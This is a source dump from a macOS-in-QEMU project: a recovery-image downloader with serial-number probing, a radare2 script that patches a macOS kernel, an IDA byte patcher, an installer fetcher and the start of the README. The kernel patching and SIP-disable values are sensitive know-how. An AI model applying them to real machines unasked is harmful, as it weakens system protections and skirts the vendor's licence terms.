verify_image(dmgpath, cnkpath): print('Verifying image with chunklist...') with open(dmgpath, 'rb') as dmgf: cnkcount = 0 for cnksize, cnkhash in verify_chunklist(cnkpath): cnkcount += 1 print(f'\rChunk {cnkcount} ({cnksize} bytes)', end='') sys.stdout.flush() cnk = dmgf.read(cnksize) if len(cnk) != cnksize: raise RuntimeError(f'Invalid chunk {cnkcount} size: expected {cnksize}, read {len(cnk)}') if hashlib.sha256(cnk).digest() != cnkhash: raise RuntimeError(f'Invalid chunk {cnkcount}: hash mismatch') if dmgf.read(1) != b'': raise RuntimeError('Invalid image: larger than chunklist') print('\rImage verification complete!\t\t\t\t\t') def action_download(args): """ Reference information for queries: Recovery latest: cid=3076CE439155BA14 sn=... bid=Mac-E43C1C25D4880AD6 k=4BE523BB136EB12B1758C70DB43BDD485EBCB6A457854245F9E9FF0587FB790C os=latest fg=B2E6AA07DB9088BE5BDB38DB2EA824FDDFB6C3AC5272203B32D89F9D8E3528DC Recovery default: cid=4A35CB95FF396EE7 sn=... bid=Mac-E43C1C25D4880AD6 k=0A385E6FFC3DDD990A8A1F4EC8B98C92CA5E19C9FF1DD26508C54936D8523121 os=default fg=B2E6AA07DB9088BE5BDB38DB2EA824FDDFB6C3AC5272203B32D89F9D8E3528DC Diagnostics: cid=050C59B51497CEC8 sn=... bid=Mac-E43C1C25D4880AD6 k=37D42A8282FE04A12A7D946304F403E56A2155B9622B385F3EB959A2FBAB8C93 fg=B2E6AA07DB9088BE5BDB38DB2EA824FDDFB6C3AC5272203B32D89F9D8E3528DC """ session = get_session(args) info = get_image_info(session, bid=args.board_id, mlb=args.mlb, diag=args.diagnostics, os_type=args.os_type) if args.verbose: print(info) print(f'Downloading {info[INFO_PRODUCT]}...') dmgname = '' if args.basename == '' else args.basename + '.dmg' dmgpath = save_image(info[INFO_IMAGE_LINK], info[INFO_IMAGE_SESS], dmgname, args.outdir) cnkname = '' if args.basename == '' else args.basename + '.chunklist' cnkpath = save_image(info[INFO_SIGN_LINK], info[INFO_SIGN_SESS], cnkname, args.outdir) try: verify_image(dmgpath, cnkpath) return 0 except Exception as err: if isinstance(err, AssertionError) and str(err) == '': try: tb = sys.exc_info()[2] while tb.tb_next: tb = tb.tb_next err = linecache.getline(tb.tb_frame.f_code.co_filename, tb.tb_lineno, tb.tb_frame.f_globals).strip() except Exception: err = "Invalid chunklist" print(f'\rImage verification failed. ({err})') return 1 def action_selfcheck(args): """ Sanity check server logic for recovery: if not valid(bid): return error() ppp = get_ppp(sn) if not valid(ppp): return latest_recovery(bid = bid) # Returns newest for bid. if valid(sn): if os == 'default': return default_recovery(sn = sn, ppp = ppp) # Returns oldest for sn. else: return latest_recovery(sn = sn, ppp = ppp) # Returns newest for sn. return default_recovery(ppp = ppp) # Returns oldest. """ session = get_session(args) valid_default = get_image_info(session, bid=RECENT_MAC, mlb=MLB_VALID, diag=False, os_type='default') valid_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_VALID, diag=False, os_type='latest') product_default = get_image_info(session, bid=RECENT_MAC, mlb=MLB_PRODUCT, diag=False, os_type='default') product_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_PRODUCT, diag=False, os_type='latest') generic_default = get_image_info(session, bid=RECENT_MAC, mlb=MLB_ZERO, diag=False, os_type='default') generic_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_ZERO, diag=False, os_type='latest') if args.verbose: print(valid_default) print(valid_latest) print(product_default) print(product_latest) print(generic_default) print(generic_latest) if valid_default[INFO_PRODUCT] == valid_latest[INFO_PRODUCT]: # Valid MLB must give different default and latest if this is not a too new product. print(f'ERROR: Cannot determine any previous product, got {valid_default[INFO_PRODUCT]}') return 1 if product_default[INFO_PRODUCT] != product_latest[INFO_PRODUCT]: # Product-only MLB must give the same value for default and latest. print(f'ERROR: Latest and default do not match for product MLB, got {product_default[INFO_PRODUCT]} and {product_latest[INFO_PRODUCT]}') return 1 if generic_default[INFO_PRODUCT] != generic_latest[INFO_PRODUCT]: # Zero MLB always give the same value for default and latest. print(f'ERROR: Generic MLB gives different product, got {generic_default[INFO_PRODUCT]} and {generic_latest[INFO_PRODUCT]}') return 1 if valid_latest[INFO_PRODUCT] != generic_latest[INFO_PRODUCT]: # Valid MLB must always equal generic MLB. print(f'ERROR: Cannot determine unified latest product, got {valid_latest[INFO_PRODUCT]} and {generic_latest[INFO_PRODUCT]}') return 1 if product_default[INFO_PRODUCT] != valid_default[INFO_PRODUCT]: # Product-only MLB can give the same value with valid default MLB. # This is not an error for all models, but for our chosen code it is. print('ERROR: Valid and product MLB give mismatch, got {product_default[INFO_PRODUCT]} and {valid_default[INFO_PRODUCT]}') return 1 print('SUCCESS: Found no discrepancies with MLB validation algorithm!') return 0 def action_verify(args): """ Try to verify MLB serial number. """ session = get_session(args) generic_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_ZERO, diag=False, os_type='latest') uvalid_default = get_image_info(session, bid=args.board_id, mlb=args.mlb, diag=False, os_type='default') uvalid_latest = get_image_info(session, bid=args.board_id, mlb=args.mlb, diag=False, os_type='latest') uproduct_default = get_image_info(session, bid=args.board_id, mlb=product_mlb(args.mlb), diag=False, os_type='default') if args.verbose: print(generic_latest) print(uvalid_default) print(uvalid_latest) print(uproduct_default) # Verify our MLB number. if uvalid_default[INFO_PRODUCT] != uvalid_latest[INFO_PRODUCT]: print(f'SUCCESS: {args.mlb} MLB looks valid and supported!' if uvalid_latest[INFO_PRODUCT] == generic_latest[INFO_PRODUCT] else f'SUCCESS: {args.mlb} MLB looks valid, but probably unsupported!') return 0 print('UNKNOWN: Run selfcheck, check your board-id, or try again later!') # Here we have matching default and latest products. This can only be true for very # new models. These models get either latest or special builds. if uvalid_default[INFO_PRODUCT] == generic_latest[INFO_PRODUCT]: print(f'UNKNOWN: {args.mlb} MLB can be valid if very new!') return 0 if uproduct_default[INFO_PRODUCT] != uvalid_default[INFO_PRODUCT]: print(f'UNKNOWN: {args.mlb} MLB looks invalid, other models use product {uproduct_default[INFO_PRODUCT]} instead of {uvalid_default[INFO_PRODUCT]}!') return 0 print(f'UNKNOWN: {args.mlb} MLB can be valid if very new and using special builds!') return 0 def action_guess(args): """ Attempt to guess which model does this MLB belong. """ mlb = args.mlb anon = mlb.startswith('000') with open(args.board_db, 'r', encoding='utf-8') as fh: db = json.load(fh) supported = {} session = get_session(args) generic_latest = get_image_info(session, bid=RECENT_MAC, mlb=MLB_ZERO, diag=False, os_type='latest') for model in db: try: if anon: # For anonymous lookup check when given model does not match latest. model_latest = get_image_info(session, bid=model, mlb=MLB_ZERO, diag=False, os_type='latest') if model_latest[INFO_PRODUCT] != generic_latest[INFO_PRODUCT]: if db[model] == 'current': print(f'WARN: Skipped {model} due to using latest product {model_latest[INFO_PRODUCT]} instead of {generic_latest[INFO_PRODUCT]}') continue user_default = get_image_info(session, bid=model, mlb=mlb, diag=False, os_type='default') if user_default[INFO_PRODUCT] != generic_latest[INFO_PRODUCT]: supported[model] = [db[model], user_default[INFO_PRODUCT], generic_latest[INFO_PRODUCT]] else: # For normal lookup check when given model has mismatching normal and latest. user_latest = get_image_info(session, bid=model, mlb=mlb, diag=False, os_type='latest') user_default = get_image_info(session, bid=model, mlb=mlb, diag=False, os_type='default') if user_latest[INFO_PRODUCT] != user_default[INFO_PRODUCT]: supported[model] = [db[model], user_default[INFO_PRODUCT], user_latest[INFO_PRODUCT]] except Exception as e: print(f'WARN: Failed to check {model}, exception: {e}') if len(supported) > 0: print(f'SUCCESS: MLB {mlb} looks supported for:') for model in supported.items(): print(f'- {model}, up to {supported[model][0]}, default: {supported[model][1]}, latest: {supported[model][2]}') return 0 print(f'UNKNOWN: Failed to determine supported models for MLB {mlb}!') return None # https://stackoverflow.com/questions/2280334/shortest-way-of-creating-an-object-with-arbitrary-attributes-in-python class gdata: """ A string to make pylint happy ;) """ def __init__(self, **kwargs): self.__dict__.update(kwargs) def main(): parser = argparse.ArgumentParser(description='Gather recovery information for Macs') parser.add_argument('--action', choices=['download', 'selfcheck', 'verify', 'guess'], default='', help='Action to perform: "download" - performs recovery downloading,' ' "selfcheck" checks whether MLB serial validation is possible, "verify" performs' ' MLB serial verification, "guess" tries to find suitable mac model for MLB.') parser.add_argument('-o', '--outdir', type=str, default='com.apple.recovery.boot', help='customise output directory for downloading, defaults to com.apple.recovery.boot') parser.add_argument('-n', '--basename', type=str, default='', help='customise base name for downloading, defaults to remote name') parser.add_argument('-b', '--board-id', type=str, default=RECENT_MAC, help=f'use specified board identifier for downloading, defaults to {RECENT_MAC}') parser.add_argument('-m', '--mlb', type=str, default=MLB_ZERO, help=f'use specified logic board serial for downloading, defaults to {MLB_ZERO}') parser.add_argument('-e', '--code', type=str, default='', help='generate product logic board serial with specified product EEEE code') parser.add_argument('-os', '--os-type', type=str, default='default', choices=['default', 'latest'], help=f'use specified os type, defaults to default {MLB_ZERO}') parser.add_argument('-diag', '--diagnostics', action='store_true', help='download diagnostics image') parser.add_argument('-s', '--shortname', type=str, default='', help='available options: high-sierra, mojave, catalina, big-sur, monterey, ventura') parser.add_argument('-v', '--verbose', action='store_true', help='print debug information') parser.add_argument('-db', '--board-db', type=str, default=os.path.join(SELF_DIR, 'boards.json'), help='use custom board list for checking, defaults to boards.json') args = parser.parse_args() if args.code != '': args.mlb = mlb_from_eeee(args.code) if len(args.mlb) != 17: print('ERROR: Cannot use MLBs in non 17 character format!') sys.exit(1) if args.action == 'download': return action_download(args) if args.action == 'selfcheck': return action_selfcheck(args) if args.action == 'verify': return action_verify(args) if args.action == 'guess': return action_guess(args) # No action specified, so present a download menu instead # https://github.com/acidanthera/OpenCorePkg/blob/master/Utilities/macrecovery/boards.json products = [ {"name": "High Sierra (10.13)", "b": "Mac-7BA5B2D9E42DDD94", "m": "00000000000J80300", "short": "high-sierra"}, {"name": "Mojave (10.14)", "b": "Mac-7BA5B2DFE22DDD8C", "m": "00000000000KXPG00", "short": "mojave"}, {"name": "Catalina (10.15)", "b": "Mac-00BE6ED71E35EB86", "m": "00000000000000000", "short": "catalina"}, {"name": "Big Sur (11.7)", "b": "Mac-2BD1B31983FE1663", "m": "00000000000000000", "short": "big-sur"}, {"name": "Monterey (12.6)", "b": "Mac-B809C3757DA9BB8D", "m": "00000000000000000", "os_type": "latest", "short": "monterey"}, {"name": "Ventura (13) - RECOMMENDED", "b": "Mac-4B682C642B45593E", "m": "00000000000000000", "os_type": "latest", "short": "ventura"}, {"name": "Sonoma (14) ", "b": "Mac-A61BADE1FDAD7B05", "m": "00000000000000000", "short": "sonoma"} ] for index, product in enumerate(products): name = product["name"] print('%s. %12s' % (index + 1, name)) # test locally using args.shortname = 'mojave' if not args.shortname or args.shortname == '': answer = input('\nChoose a product to download (1-%s): ' % len(products)) try: index = int(answer) - 1 if index < 0: raise ValueError except (ValueError, IndexError): pass else: index = 0 for product in products: if args.shortname == product['short']: break else: index = index+1 product = products[index] try: os_type = product["os_type"] except: os_type = "default" args = gdata(mlb = product["m"], board_id = product["b"], diagnostics = False, os_type = os_type, verbose=False, basename="", outdir=".") action_download(args) if __name__ == '__main__': sys.exit(main()) File: resources/kernel_autopatcher.py #!/usr/bin/env python # # NOTE -> https://github.com/kholia/OSX-KVM/blob/master/reversing-notes.md # # https://github.com/radareorg/radare2-r2pipe/blob/master/python/examples/libgraph.py # https://github.com/radareorg/radare2-r2pipe/tree/master/python # # https://www.hex-rays.com/wp-content/uploads/2019/12/xnu_debugger_primer.pdf # https://geosn0w.github.io/Debugging-macOS-Kernel-For-Fun/ # # sudo apt-get install radare2 # Ubuntu 20.04 LTS # pip install r2pipe # # This software is Copyright (c) 2020, Dhiru Kholia. This program is provided # for educational, research, and non-commercial personal use only. # !!! ATTENTION !!! Any commercial usage against the Apple EULA is at your own # risk! # # Note: Commercial usage and redistribution is forbidden (not allowed). # # THIS SOFTWARE IS PROVIDED BY <COPYRIGHT HOLDER> 'AS IS' AND ANY EXPRESS OR # IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO # EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY DIRECT, INDIRECT, # INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, # OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF # LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING # NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # $ ./kernel_autopatcher.py kernel # [+] Processing <kernel> file... # [+] Patching done! # # (Re)Tested against the default "kernel" from macOS Catalina 10.15.7 in # October, 2020. # # Note: Disable SIP on the macOS VM (We do it via OpenCore's config.plist) # `00000000` - SIP completely enabled # `30000000` - Allow unsigned kexts and writing to protected fs locations # `67000000` - SIP completely disabled # # Note: sudo mount -uw / # # Kernel location (Catalina): /System/Library/Kernels/kernel # # $ md5sum kernel* # 3966d407c344708d599500c60c1194c0 kernel # 8530d3422795652ed320293ecc127770 kernel.patched # # Test command -> sudo /usr/bin/AssetCacheManagerUtil activate import r2pipe import sys import os def patcher(fname): target_symbol = "sym._cpuid_get_feature_names" # analysis code # r2 = r2pipe.open(fname, ["-2"]) # -2 -> disable stderr messages r2 = r2pipe.open(fname, ["-2", "-w"]) # -2 -> disable stderr messages print("[+] Processing <%s> file..." % fname) r2.cmd('aa') # print(r2.cmd("pdf @ sym._cpuid_get_feature_names")) result = r2.cmdj("axtj %s" % target_symbol) if not result: print("[!] Can't find xrefs to <%s>. Aborting!" % target_symbol) sys.exit(2) # print(result) r2.cmd("s `axt sym._cpuid_get_feature_names~[1]`") # jump to the function call site result = r2.cmdj("pdj 1") if not result: print("[!] Can't disassemble instruction at function call site. Aborting!") sys.exit(3) opcode_size = result[0]["size"] assert (opcode_size == 5) # sanity check, call sym._cpuid_get_feature_name -> 5 bytes # patching code # > pa nop r2.cmd("\"wa nop;nop;nop;nop;nop\"") r2.quit() print("[+] Patching done!") if __name__ == "__main__": if len(sys.argv) > 1: path = sys.argv[1] patcher(path) else: print("Usage: %s [path-to-kernel-file]" % (sys.argv[0])) sys.exit(1) File: resources/idadif.py #!/usr/bin/env python # Small IDA .dif patcher - https://stalkr.net/files/ida/idadif.py import re from sys import argv,exit def patch(file, dif, revert=False): code = open(file,'rb').read() dif = open(dif,'r').read() m = re.findall('([0-9a-fA-F]+): ([0-9a-fA-F]+) ([0-9a-fA-F]+)', dif) for offset,orig,new in m: o, orig, new = int(offset,16), orig.decode('hex'), new.decode('hex') if revert: if code[o]==new: code = code[:o]+orig+code[o+1:] else: raise Exception("patched byte at %s is not %02X" % (offset, ord(new))) else: if code[o]==orig: code = code[:o]+new+code[o+1:] else: raise Exception("original byte at %s is not %02X" % (offset, ord(orig))) open(file,'wb').write(code) def main(): if len(argv)<3: print("Usage: %s <binary> <IDA.dif file> [revert]" % (argv[0])) print("Applies given IDA .dif file to patch binary; use revert to revert patch.") exit(0) file, dif, revert = argv[1], argv[2], False if len(argv)>3: revert = True print("Reverting patch %r on file %r" % (dif, file)) else: print("Patching file %r with %r" % (file, dif)) try: patch(file, dif, revert) print("Done") except Exception as e: print("Error: %s" % str(e)) exit(1) if __name__ == "__main__": main() File: backups/fetch-macOS.py #!/usr/bin/env python3 # encoding: utf-8 # # https://github.com/munki/macadmin-scripts/blob/master/installinstallmacos.py # # Copyright 2017 Greg Neagle. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # Thanks to Tim Sutton for ideas, suggestions, and sample code. # # Updated in May of 2019 by Dhiru Kholia. '''installinstallmacos.py A tool to download the parts for an Install macOS app from Apple's softwareupdate servers and install a functioning Install macOS app onto an empty disk image''' # https://github.com/foxlet/macOS-Simple-KVM/blob/master/tools/FetchMacOS/fetch-macos.py # is pretty similar. # Bad hack import warnings warnings.filterwarnings("ignore", category=DeprecationWarning) import os import gzip import argparse import plistlib import subprocess from xml.dom import minidom from xml.parsers.expat import ExpatError import sys if sys.version_info[0] < 3: import urlparse as urlstuff else: import urllib.parse as urlstuff # Quick fix for python 3.9 and above if sys.version_info[0] == 3 and sys.version_info[1] >= 9: from types import MethodType def readPlist(self,filepath): with open(filepath, 'rb') as f: p = plistlib._PlistParser(dict) rootObject = p.parse(f) return rootObject # adding the method readPlist() to plistlib plistlib.readPlist = MethodType(readPlist, plistlib) # https://github.com/foxlet/macOS-Simple-KVM/blob/master/tools/FetchMacOS/fetch-macos.py (unused) # https://github.com/munki/macadmin-scripts catalogs = { "CustomerSeed": "https://swscan.apple.com/content/catalogs/others/index-10.16customerseed-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", "DeveloperSeed": "https://swscan.apple.com/content/catalogs/others/index-10.16seed-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", "PublicSeed": "https://swscan.apple.com/content/catalogs/others/index-10.16beta-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", "PublicRelease": "https://swscan.apple.com/content/catalogs/others/index-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", "20": "https://swscan.apple.com/content/catalogs/others/index-11-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", '21': "https://swscan.apple.com/content/catalogs/others/index-12-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog", '22': "https://swscan.apple.com/content/catalogs/others/index-13-12-10.16-10.15-10.14-10.13-10.12-10.11-10.10-10.9-mountainlion-lion-snowleopard-leopard.merged-1.sucatalog" } def get_default_catalog(): '''Returns the default softwareupdate catalog for the current OS''' return catalogs["22"] # return catalogs["PublicRelease"] # return catalogs["DeveloperSeed"] class ReplicationError(Exception): '''A custom error when replication fails''' pass def cmd_exists(cmd): return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0 def replicate_url(full_url, root_dir='/tmp', show_progress=False, ignore_cache=False, attempt_resume=False, installer=False, product_title=""): '''Downloads a URL and stores it in the same relative path on our filesystem. Returns a path to the replicated file.''' # hack print("[+] Fetching %s" % full_url) if installer and "BaseSystem.dmg" not in full_url and "Big Sur" not in product_title and "Monterey" not in product_title and "Ventura" not in product_title: return if ("Big Sur" in product_title or "Monterey" in product_title or "Ventura" in product_title) and "InstallAssistant.pkg" not in full_url: return attempt_resume = True # path = urllib.parse.urlsplit(full_url)[2] path = urlstuff.urlsplit(full_url)[2] relative_url = path.lstrip('/') relative_url = os.path.normpath(relative_url) # local_file_path = os.path.join(root_dir, relative_url) local_file_path = relative_url # print("Downloading %s..." % full_url) if cmd_exists('wget'): if not installer: download_cmd = ['wget', "-c", "--quiet", "-x", "-nH", full_url] # this doesn't work as there are multiple metadata files with the same name! # download_cmd = ['wget', "-c", "--quiet", full_url] else: download_cmd = ['wget', "-c", full_url] else: if not installer: download_cmd = ['curl', "--silent", "--show-error", "-o", local_file_path, "--create-dirs", full_url] else: local_file_path = os.path.basename(local_file_path) download_cmd = ['curl', "-o", local_file_path, full_url] try: subprocess.check_call(download_cmd) except subprocess.CalledProcessError as err: raise ReplicationError(err) return local_file_path def parse_server_metadata(filename): '''Parses a softwareupdate server metadata file, looking for information of interest. Returns a dictionary containing title, version, and description.''' title = '' vers = '' try: md_plist = plistlib.readPlist(filename) except (OSError, IOError, ExpatError) as err: print('Error reading %s: %s' % (filename, err), file=sys.stderr) return {} vers = md_plist.get('CFBundleShortVersionString', '') localization = md_plist.get('localization', {}) preferred_localization = (localization.get('English') or localization.get('en')) if preferred_localization: title = preferred_localization.get('title', '') metadata = {} metadata['title'] = title metadata['version'] = vers """ {'title': 'macOS Mojave', 'version': '10.14.5'} {'title': 'macOS Mojave', 'version': '10.14.6'} """ return metadata def get_server_metadata(catalog, product_key, workdir, ignore_cache=False): '''Replicate ServerMetaData''' try: url = catalog['Products'][product_key]['ServerMetadataURL'] try: smd_path = replicate_url( url, root_dir=workdir, ignore_cache=ignore_cache) return smd_path except ReplicationError as err: print('Could not replicate %s: %s' % (url, err), file=sys.stderr) return None except KeyError: # print('Malformed catalog.', file=sys.stderr) return None def parse_dist(filename): '''Parses a softwareupdate dist file, returning a dict of info of interest''' dist_info = {} try: dom = minidom.parse(filename) except ExpatError: print('Invalid XML in %s' % filename, file=sys.stderr) return dist_info except IOError as err: print('Error reading %s: %s' % (filename, err), file=sys.stderr) return dist_info titles = dom.getElementsByTagName('title') if titles: dist_info['title_from_dist'] = titles[0].firstChild.wholeText auxinfos = dom.getElementsByTagName('auxinfo') if not auxinfos: return dist_info auxinfo = auxinfos[0] key = None value = None children = auxinfo.childNodes # handle the possibility that keys from auxinfo may be nested # within a 'dict' element dict_nodes = [n for n in auxinfo.childNodes if n.nodeType == n.ELEMENT_NODE and n.tagName == 'dict'] if dict_nodes: children = dict_nodes[0].childNodes for node in children: if node.nodeType == node.ELEMENT_NODE and node.tagName == 'key': key = node.firstChild.wholeText if node.nodeType == node.ELEMENT_NODE and node.tagName == 'string': value = node.firstChild.wholeText if key and value: dist_info[key] = value key = None value = None return dist_info def download_and_parse_sucatalog(sucatalog, workdir, ignore_cache=False): '''Downloads and returns a parsed softwareupdate catalog''' try: localcatalogpath = replicate_url( sucatalog, root_dir=workdir, ignore_cache=ignore_cache) except ReplicationError as err: print('Could not replicate %s: %s' % (sucatalog, err), file=sys.stderr) exit(-1) if os.path.splitext(localcatalogpath)[1] == '.gz': with gzip.open(localcatalogpath) as the_file: content = the_file.read() try: catalog = plistlib.readPlistFromString(content) return catalog except ExpatError as err: print('Error reading %s: %s' % (localcatalogpath, err), file=sys.stderr) exit(-1) else: try: catalog = plistlib.readPlist(localcatalogpath) return catalog except (OSError, IOError, ExpatError) as err: print('Error reading %s: %s' % (localcatalogpath, err), file=sys.stderr) exit(-1) def find_mac_os_installers(catalog): '''Return a list of product identifiers for what appear to be macOS installers''' mac_os_installer_products = [] if 'Products' in catalog: for product_key in catalog['Products'].keys(): product = catalog['Products'][product_key] try: if product['ExtendedMetaInfo'][ 'InstallAssistantPackageIdentifiers']: mac_os_installer_products.append(product_key) except KeyError: continue return mac_os_installer_products def os_installer_product_info(catalog, workdir, ignore_cache=False): '''Returns a dict of info about products that look like macOS installers''' product_info = {} installer_products = find_mac_os_installers(catalog) for product_key in installer_products: product_info[product_key] = {} filename = get_server_metadata(catalog, product_key, workdir) if filename: product_info[product_key] = parse_server_metadata(filename) else: # print('No server metadata for %s' % product_key) product_info[product_key]['title'] = None product_info[product_key]['version'] = None product = catalog['Products'][product_key] product_info[product_key]['PostDate'] = product['PostDate'] distributions = product['Distributions'] dist_url = distributions.get('English') or distributions.get('en') try: dist_path = replicate_url( dist_url, root_dir=workdir, ignore_cache=ignore_cache) except ReplicationError as err: print('Could not replicate %s: %s' % (dist_url, err), file=sys.stderr) else: dist_info = parse_dist(dist_path) product_info[product_key]['DistributionPath'] = dist_path product_info[product_key].update(dist_info) if not product_info[product_key]['title']: product_info[product_key]['title'] = dist_info.get('title_from_dist') if not product_info[product_key]['version']: product_info[product_key]['version'] = dist_info.get('VERSION') return product_info def replicate_product(catalog, product_id, workdir, ignore_cache=False, product_title=""): '''Downloads all the packages for a product''' product = catalog['Products'][product_id] for package in product.get('Packages', []): # TO-DO: Check 'Size' attribute and make sure # we have enough space on the target # filesystem before attempting to download if 'URL' in package: try: replicate_url( package['URL'], root_dir=workdir, show_progress=True, ignore_cache=ignore_cache, attempt_resume=(not ignore_cache), installer=True, product_title=product_title) except ReplicationError as err: print('Could not replicate %s: %s' % (package['URL'], err), file=sys.stderr) exit(-1) if 'MetadataURL' in package: try: replicate_url(package['MetadataURL'], root_dir=workdir, ignore_cache=ignore_cache, installer=True) except ReplicationError as err: print('Could not replicate %s: %s' % (package['MetadataURL'], err), file=sys.stderr) exit(-1) def find_installer_app(mountpoint): '''Returns the path to the Install macOS app on the mountpoint''' applications_dir = os.path.join(mountpoint, 'Applications') for item in os.listdir(applications_dir): if item.endswith('.app'): return os.path.join(applications_dir, item) return None def determine_version(version, title, product_info): if version: if version == 'latest': from distutils.version import StrictVersion latest_version = StrictVersion('0.0.0') for index, product_id in enumerate(product_info): if not title or product_info[product_id]['title'] == title: d = product_info[product_id]['version'] if d > latest_version: latest_version = d if latest_version == StrictVersion("0.0.0"): print("Could not find latest version {}") exit(1) version = str(latest_version) for index, product_id in enumerate(product_info): v = product_info[product_id]['version'] if v == version: return product_id, product_info[product_id]['title'] print("Could not find version {}. Versions available are:".format(version)) for _, pid in enumerate(product_info): print("- {}".format(product_info[pid]['version'])) exit(1) # display a menu of choices (some seed catalogs have multiple installers) print('%2s %12s %10s %11s %s' % ('#', 'ProductID', 'Version', 'Post Date', 'Title')) for index, product_id in enumerate(product_info): print('%2s %12s %10s %11s %s' % ( index + 1, product_id, product_info[product_id]['version'], product_info[product_id]['PostDate'].strftime('%Y-%m-%d'), product_info[product_id]['title'] )) answer = input( '\nChoose a product to download (1-%s): ' % len(product_info)) try: index = int(answer) - 1 if index < 0: raise ValueError product_id = list(product_info.keys())[index] return product_id, product_info[product_id]['title'] except (ValueError, IndexError): pass print('Invalid input provided.') exit(0) def main(): '''Do the main thing here''' """ if os.getuid() != 0: sys.exit('This command requires root (to install packages), so please ' 'run again with sudo or as root.') """ parser = argparse.ArgumentParser() parser.add_argument('--workdir', metavar='path_to_working_dir', default='.', help='Path to working directory on a volume with over ' '10G of available space. Defaults to current working ' 'directory.') parser.add_argument('--version', metavar='version', default=None, help='The version to download in the format of ' '"$major.$minor.$patch", e.g. "10.15.4". Can ' 'be "latest" to download the latest version.') parser.add_argument('--title', metavar='title', default=None, help='When using "--version latest", you can use ' 'this to filter the search to only products with ' 'this title') parser.add_argument('--compress', action='store_true', help='Output a read-only compressed disk image with ' 'the Install macOS app at the root. This is now the ' 'default. Use --raw to get a read-write sparse image ' 'with the app in the Applications directory.') parser.add_argument('--raw', action='store_true', help='Output a read-write sparse image ' 'with the app in the Applications directory. Requires ' 'less available disk space and is faster.') parser.add_argument('--ignore-cache', action='store_true', help='Ignore any previously cached files.') args = parser.parse_args() su_catalog_url = get_default_catalog() if not su_catalog_url: print('Could not find a default catalog url for this OS version.', file=sys.stderr) exit(-1) # download sucatalog and look for products that are for macOS installers catalog = download_and_parse_sucatalog( su_catalog_url, args.workdir, ignore_cache=args.ignore_cache) product_info = os_installer_product_info( catalog, args.workdir, ignore_cache=args.ignore_cache) if not product_info: print('No macOS installer products found in the sucatalog.', file=sys.stderr) exit(-1) product_id, product_title = determine_version(args.version, args.title, product_info) print(product_id, product_title) # download all the packages for the selected product replicate_product(catalog, product_id, args.workdir, ignore_cache=args.ignore_cache, product_title=product_title) if __name__ == '__main__': main()
### Note This `README.md` documents the process of creating a `Virtual Hackintosh` system. Note: All blobs and resources included in this repository are re-derivable (all instructions are included!). :green_heart: Looking for **commercial** support with this stuff? I am [available over email](mailto:[email protected]?subject=[GitHub]%20OSX-KVM%20Commercial%20Support%20Request&body=Hi%20-%20We%20are%20interested%20in%20purchasing%20commercial%20support%20options%20for%20your%20project.) for a chat for **commercial support options only**. Note: Project sponsors get access to the `Private OSX-KVM` repository, and direct support. Struggling with `Content Caching` stuff? We can help. Working with `Proxmox` and macOS? See [Nick's blog for sure](https://www.nicksherlock.com/). Yes, we support offline macOS installations now - see [this document](./run_offline.md) 🎉 ### Contributing Back This project can always use your help, time and attention. I am looking for help (pull-requests!) with the following work items: * Documentation around running macOS on popular cloud providers (Hetzner, GCP, AWS). See the `Is This Legal?` section and associated references. * Document (share) how you use this project to build + test open-source projects / get your stuff done. * Document how to use this project for XNU kernel debugging and development. * Document the process to launch a bunch of headless macOS VMs (build farm). * Document usage of [munki](https://github.com/munki/munki) to deploy software to such a `build farm`. * Enable VNC + SSH support out of the box or more easily. * Robustness improvements are always welcome! * (Not so) crazy idea - automate the macOS installation via OpenCV. ### Requirements * A modern Linux distribution. E.g. Ubuntu 24.04 LTS 64-bit or later. * QEMU >= 8.2.2 * A CPU with Intel VT-x / AMD SVM support is required (`grep -e vmx -e svm /proc/cpuinfo`) * A CPU with SSE4.1 support is required for >= macOS Sierra * A CPU with AVX2 support is required for >= macOS Ventura Note: Older AMD CPU(s) are known to be problematic but modern AMD Ryzen processors work just fine (even for macOS Sonoma). ### Installation Preparation * Install QEMU and other packages. ``` sudo apt-get install qemu-system uml-utilities virt-manager git \ wget libguestfs-tools p7zip-full make dmg2img tesseract-ocr \ tesseract-ocr-eng genisoimage vim net-tools screen -y ``` This step may need to be adapted for your Linux distribution. * Clone this repository on your QEMU system. Files from this repository are used in the following steps. ``` cd ~ git clone --depth 1 --recursive https://github.com/kholia/OSX-KVM.git cd OSX-KVM ``` Repository updates can be pulled via the following command: ``` git pull --rebase ``` This repository uses rebase based workflows heavily. * KVM may need the following 